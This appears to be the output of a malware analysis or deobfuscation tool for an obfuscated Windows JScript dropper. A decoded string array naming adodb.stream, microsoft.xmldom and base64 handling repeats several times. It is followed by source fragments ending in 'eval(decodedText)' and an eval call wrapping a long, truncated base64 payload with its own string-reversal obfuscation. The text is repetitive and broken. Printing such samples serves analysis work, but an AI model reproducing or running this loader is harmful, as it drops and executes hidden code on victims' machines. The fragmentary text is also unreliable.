                                                                                                                                            • _0x45f4() ➔ mko,56aEstzl,Open,us-ascii,2382rQRreo,Type,151212NeWBHv,171iXGpSV,173920wjKeEW,213970IFnRnT,100300VuLhdD,CharSet,replace,Write,adodb.stream,CreateObject,66riMPzf,1588rHmVvo,microsoft.xmldom,nodeTypedValue,bin.base64,535JemZUP,dataType,7092rXFGgQ,9656fZrHIS,createElement
                                                                                                                                            • _0x45f4() ➔ mko,56aEstzl,Open,us-ascii,2382rQRreo,Type,151212NeWBHv,171iXGpSV,173920wjKeEW,213970IFnRnT,100300VuLhdD,CharSet,replace,Write,adodb.stream,CreateObject,66riMPzf,1588rHmVvo,microsoft.xmldom,nodeTypedValue,bin.base64,535JemZUP,dataType,7092rXFGgQ,9656fZrHIS,createElement
                                                                                                                                            • _0x45f4() ➔ mko,56aEstzl,Open,us-ascii,2382rQRreo,Type,151212NeWBHv,171iXGpSV,173920wjKeEW,213970IFnRnT,100300VuLhdD,CharSet,replace,Write,adodb.stream,CreateObject,66riMPzf,1588rHmVvo,microsoft.xmldom,nodeTypedValue,bin.base64,535JemZUP,dataType,7092rXFGgQ,9656fZrHIS,createElement
                                                                                                                                            • _0x45f4() ➔ mko,56aEstzl,Open,us-ascii,2382rQRreo,Type,151212NeWBHv,171iXGpSV,173920wjKeEW,213970IFnRnT,100300VuLhdD,CharSet,replace,Write,adodb.stream,CreateObject,66riMPzf,1588rHmVvo,microsoft.xmldom,nodeTypedValue,bin.base64,535JemZUP,dataType,7092rXFGgQ,9656fZrHIS,createElement
                                                                                                                                            • _0x45f4() ➔ mko,56aEstzl,Open,us-ascii,2382rQRreo,Type,151212NeWBHv,171iXGpSV,173920wjKeEW,213970IFnRnT,100300VuLhdD,CharSet,replace,Write,adodb.stream,CreateObject,66riMPzf,1588rHmVvo,microsoft.xmldom,nodeTypedValue,bin.base64,535JemZUP,dataType,7092rXFGgQ,9656fZrHIS,createElement
                                                                                                                                            • _0x45f4() ➔ mko,56aEstzl,Open,us-ascii,2382rQRreo,Type,151212NeWBHv,171iXGpSV,173920wjKeEW,213970IFnRnT,100300VuLhdD,CharSet,replace,Write,adodb.stream,CreateObject,66riMPzf,1588rHmVvo,microsoft.xmldom,nodeTypedValue,bin.base64,535JemZUP,dataType,7092rXFGgQ,9656fZrHIS,createElement
                                                                                                                                            • _0x45f4() ➔ mko,56aEstzl,Open,us-ascii,2382rQRreo,Type,151212NeWBHv,171iXGpSV,173920wjKeEW,213970IFnRnT,100300VuLhdD,CharSet,replace,Write,adodb.stream,CreateObject,66riMPzf,1588rHmVvo,microsoft.xmldom,nodeTypedValue,bin.base64,535JemZUP,dataType,7092rXFGgQ,9656fZrHIS,createElement
                                                                                                                                            • _0x45f4() ➔ mko,56aEstzl,Open,us-ascii,2382rQRreo,Type,151212NeWBHv,171iXGpSV,173920wjKeEW,213970IFnRnT,100300VuLhdD,CharSet,replace,Write,adodb.stream,CreateObject,66riMPzf,1588rHmVvo,microsoft.xmldom,nodeTypedValue,bin.base64,535JemZUP,dataType,7092rXFGgQ,9656fZrHIS,createElement
                                                                                                                                            92
                                                                                                                                            return V;
                                                                                                                                              93
                                                                                                                                              } ) ( );
                                                                                                                                                94
                                                                                                                                                }
                                                                                                                                                  95
                                                                                                                                                  eval ( decodedText );
                                                                                                                                                  • eval("try{ var longText1 = "DQovLyBTdHJpbmcgZnVuY3Rpb24gaGFzIG1vZGlmaWVkIEZVRENSWVBUDQokNUZad0xQRHVMbWhkM3RvTjQ5ej1mdW5jdGlvbihuKXtpZiAodHlwZW9mICgkNUZad0xQRHVMbWhkM3RvTjQ5ei5saXN0W25dKSA9PSAic3RyaW5nIikgcmV0dXJuICQ1Rlp3TFBEdUxtaGQzdG9ONDl6Lmxpc3Rbbl0uc3BsaXQoIiIpLnJldmVyc2UoKS5qb2luKCIiKTtyZXR1cm4gJDVGWndMUER1TG1oZDN0b040OXoubGlzdFtuXTt9Ow0KJDVGWndMUER1TG1oZDN0b040OXoubGlzdD1bLz4hL2csInZIQldlTjIxMjE1MSIsInVYV21uTjUyOTI3MTEiLCJhbWJycWMxNTMwNDUzMSIsInNpS2JpajYzMTg4MSIsIkVWeGFRTTYwNDc2NCIsIlRuUm5GSTA3OTMxMiIsIldFZUtqdzAyOTM3MSIsIj1vUUQ5cFFEOXBRRDdCU0t5Slhab2cyWTBGMllnMG5DTnNUS2xWbmMweGliM0J5S2dJQ1hjSkNJciE+Q2EwRkdVdVlHYmxObExwY0RLbE5XWXdOVlp0Rm1UdSE+WFlnd1NkbWhTWnNsbVI1QjNiRDV5Y21wUUQ3a2lNb0kzUWcwREl3RkdJeUZtZEswd2Vna25jMHBRRDlwUUQ3QlNLeUpYWm9nMlkwRjJZZzBuQ05zVEtkVnpXbnhpSWl3bElnc0NJMVpHSXIhPmlJaXdsSXNJQ1J5SXpUYVZrUzNjelZpIT55S2cwMU1iZEdJciE+U1h3czFab1VHZHBKM1ZuVm1VdWcyY0swd2Vna25jMHBRRDdCU0tvTW5UZzQyYnBSM1l1Vm5aSzBRZkswUWZLMFFmSzB3T3JGV1p5Sm1DTnNqY2xKV2IxNUdiaGxtY2xOWFp0VkhidlpuTDBsR0l1SlhkMFZtY0swd09wZ1NibFJYYXU0V1pnMERJMGxHSXlGbWRLMHdlZ2tTS29RSGVsNVVaMjlXYnU0V1o3a0NLazVXUjBGbUx1VldJZ3NES2dJM2JtcFFEN2t5Y29JM2IwRm1jbDFXZHVWRUkzVm1iZzBESXVWR0l5Rm1kSzB3T3AwVk1ibEhLbTkwY2xObWJoUjNjdWxrTHAwRk1ibEhLME5XWnFKMlQwVjJSZzBESXpwUUQ3QlNLMjBUUE9oQ0ltbG1DTjBuQ04wbkNOc1RadEZtVDVGR2J3TlhhRTVDZHBCaWJ5VkhkbEpuQ05zSElsTkhibEJTZkswUWZLMHdPbDFXWU9sWFlzQjNjcFJrTDBsR0l1SlhkMFZtY0swd09wZ1NibFJYYXU0V1pnMERJMGxtQ05zSElwa0NLMGhYWk9WbWR2MW1MdVYyT3BnQ1p1VkVkaDVpYmxGQ0k3Z0NJeTltWkswd09wTUhLeTlHZGhKWFp0Vm5iRkJ5ZGw1R0k5IT5pYmxwUUQ3a1NYenNWZW9ZMlR6VjJZdUZHZHo1V1N1a3ladGRISzBOV1pxSjJUMFYyUmcwREl6cFFEN0lpTWkhPnlLZ2NXYjNCU1BnY1diM3BRRDdCU0tuY0NJOTBUSWdJSGR6aENJbWxtQ04wbkNOc1RadEZtVDVGR2J3TlhhRTVDZHBCU1BnSUhkekJpY2habkNOc1RLbzBXWjBsbUx1VkdJOSE+Q2RwQmljaFpuQ05zSElwa0NLMGhYWk9WbWR2MW1MdVYyT3BnQ1p1VkVkaDVpYmxGQ0k3Z0NJeTltWkswd09wTUhLeTlHZGhKWFp0Vm5iRkJ5ZGw1R0k5IT5pYmxCaWNoWm5DTnNUS2ROelc1aGlaUE5YWmo1V1kwTm5iSjVTS24xMmRvUTNZbHBtWVBSWFpIQlNQZ01uQ05zakl5VkdkdVYyWTVSWGF5VjNZbE5IWGNSM2J2SkhYY1IzY3ZoR2JoTjJic3hGWGN4bE96UlhibjFtYnBkbklnMERJbjEyZGdJWFkycFFEN0JTSzAhPlNQOSE+aVRvIT5pWnBwUUQ5cFFEOXBRRDdzV1lsSm5ZSzB3T3U5V2EwQlhZRDVDZHBCaWJ5VkhkbEpuQ05zVEtvMFdaMGxtTHVWR0k5IT5DZHBCaWNoWm5DTnNISXBrQ0swaFhaT1ZtZHYxbUx1VjJPcGdDWnVWRWRoNWlibEZDSTdnQ0l5OW1aSzB3T3BNSEt5OUdkaEpYWnRWbmJGQnlkbDVHSTkhPmlibEJpY2habkNOc1RLZEp6VzVoaVpQTlhaajVXWTBObmJKNVNLZEJ6VzVoQ2RqVm1haTlFZGxkRUk5IT55Y0swd2Vna2lNZzBUUGc0RUtnWVdhSzB3T3pCaWNoWm5DTnNISXA0RUtpOUVJdTlXYTBObWIxWm1DTjBuQ05zVEtkNTBXcWhDZGpWbWFpOUVXbFpYYTBOV1FnY1hadUJpYnlWSGRsSm5DTnNISXA0RUt5TkVJdTlXYTBObWIxWm1DTjBuQ05zemNnNG1jMVJYWnlwUUQ3ZzJRZ3NDSVZCeUtnZzJRZ3NDSVU1RUlyIT5DYURCeUtnZzJRZ3NDSXBRREtpOUVJciE+Q2FEQnlLZ2tpTW9JMlRnc0NJb05FSXIhPlNLaVVVVEI1a1VGTlZWaWdDZUZCeUtnZzJRZ3NDSXBJU1JORmtUU1ZFVlZCVlRQTmtJb2dYUmdzQ0lvTkVJciE+aVRXQlNQZ01uQ04wbkNOc2pJUDVrSWcwRElVNWtDTnNISWxOSGJsQlNmSzB3T2lNVlJaSlNQZ1FsVEswd2Vna1NLaVVHZWw1eVlpWkhYY2RqTTMhPlROdSE+akx5WUhYY3RtY3ZkWFp0Rm1jR3hGWFVWa1R1UW5adk4zYnlOV2FOeEZYaSE+eUtna2lJeWxHWnVsMlZpZ0NlRmh5YzBOWGE0Vldac2xtWnVNblpvIT5pWnBwUUQ3a0dMVTVFTHpCaWNoWm5DTnNISXBnaVp1QmlidmxHZGo1V2RtcFFEOXBRRDdRSGVsUlhaejUyYndOWFp5NUNXZzRtYzFSWFp5cFFEN2tTUW9RbWJsTm5MWXBRRDdrU0tvWW1ic0lpTzA1V1puRlVMeVYyY1ZKQ0t5VkdaaFZHUzBOWFoxRlhaU1JYWlQ1Q1dLMHdPcFUyY3NGbVpnd3lRZ3NDSW44Q04za3pONmdUT3g0U016SWpMMk1qTXVVRE94OHlMNiE+SGQwaDJKc2NDVlQ5RVVuZ2libEIzYnVnbENOc1RLemdpY0RCU1BnZ0ZJeUZtZEswd2Vna1NRc01FSzBCRkl1OVdhME5tYjFabUNOMG5DTnNUS2lVaUlnc0NJVEJ5S2dJU0ppZ3ljbjVXYXlSM1UwNVdadDUyYnlsbWR1VkVadUZHYzRWa0xvTkhJdUpYZDBWbWNLMHdlZ2t5VW9nWFJnNDJicFIzWXVWblpLMHdPZ2tTWjFKSGRvIT5TWnNsR2EzQlNmSzB3T3AhPkRNd2NES3dWV1pzTmxMMEJYYXlOMlVYcFFEOXBRRDdCU0t5Slhab2cyWTBGMllnMG5DTjBuQ05zVEt5TUhLdVZuY3VnMmNLMHdPcGdTWno5R2JENVNhbXBRRDdrU1h4c0ZVb1VHZHBKM1Z1a21aSzB3T3BVV2R5UkhMeU1IS2x4V2FHUkhlbFJWWjBGV1p5TmtMelpHSTkhPlNhbUJpY2habkNOc1RYeXNGVWdzQ0lpd0ZYaSE+eUtna2lJdzFXWjBKQ0s0VkVJOSE+aU16QmljaFpuQ05zSElwSWlSU0pDSTkwVFBnMEZNYkJGS2dZV2FLMFFmSzB3T3BFREswbFdkUjVDZHdsbWNqTjFWSzB3T3BJemNvd1dZMlZtQ05zVEtwZFdaeXhpSWxVbVRuSlZKaWdTWmpGR2J3Vm1jdWtpY2taSExpSUhabU5YSmlnU1pqRkdid1ZtY3VraWIzeGlJdVZpSW9VMlloeEdjbEpuTHBVblpzSWlabElDS2xOV1lzQlhaeTVpTXpCU1BnSXpjSzB3T2lRa015OGtXRnAwTjNjbElnMERJcGRXWnlCaW") ➔
                                                                                                                                                  Reset < >